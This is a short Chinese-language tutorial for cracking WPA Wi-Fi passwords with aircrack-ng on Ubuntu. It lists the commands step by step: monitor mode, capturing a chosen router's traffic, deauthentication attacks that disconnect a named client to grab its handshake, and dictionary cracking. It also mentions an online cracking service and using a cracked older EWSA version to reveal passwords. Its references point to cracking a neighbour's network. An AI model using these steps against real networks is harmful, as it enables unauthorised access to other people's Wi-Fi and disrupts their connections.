Airmon-ng抓包&破解wifi

• 安装 
   
  aircrack获取(aircrack源)

  sudo apt-get install aircrack-ng

  配置 安装组件

  sudo apt-get install build-essential libssl-dev pkg-config libnl-3-dev libnl-genl-3-dev

  关闭网络功能 (未关闭监听的时候会无法获得正确的信息)

service net-manager stop

关闭相关进程

sudo airmon-ng check kill

 

• 监听

查看本机的网卡  (可以看到我的电脑上有一块无线网卡wlp3s0)

iwconfig

打开网络监听  (wlp3s0为你选择的网卡的名称，并且我们可以在右下角看到接口名 mon0)

airmon-ng start wlp3s0

监听所有wifi（这个窗口可以关掉）

sudo airodump-ng mon0

监听特定的频道（*=频道号）(/home/tmp=包存放路径）

airodump-ng -c * --bssid C8:3A:35:5C:D6:F8 -w /home/tmp mon0

• 抓包 
   
  注入攻击（2=攻击次数）（C8:3A:35:5C:D6:F8=路由器mac）(A0:86:C6:A3:F3:05=被监听的客户机MAC地址)

  sudo aireplay-ng -0 2 -a C8:3A:35:5C:D6:F8 -c A0:86:C6:A3:F3:05 mon0

 

监听终端右上WAP handshake时说明抓包成功

• 破解

  aircrack-ng算号

aircrack-ng -w *.txt *.cap

EWAS算号(Windows系统) 
 
ewas算号使用7.0高版本未注册版 (可实现 CPU&显卡 加速 7w~10w/s) 
默认情况需要禁用 字典设置-密码突变选项 
算出来密码不可见 将项目导入低版本破解版(实测6.0可用)密码可见

GPUHASH.me（wpa在线破解）

• 善后

  关闭网络监听

  airmon-ng stop mon0
  

  打开网络

  service network-manager start

• Bug

  无线网卡监听时出现“fixed channel mon0: -1”错误（内核问题）

  1. 监听特定的频道和抓包注入攻击时末尾添加--ignore-negative-one即可避免报错

  2. 重新启动系统

  3. 更换系统内核版本

————————————————————以下参考————————————————————

Ubuntu下用aircrack破解WIFI密码

Ubuntu14.04－64位使用aircrack-ng和minidwep-gtk破解WIFI密码的图文教程

用Hashcat每秒计算1.4亿个密码，破解隔壁WIFI密码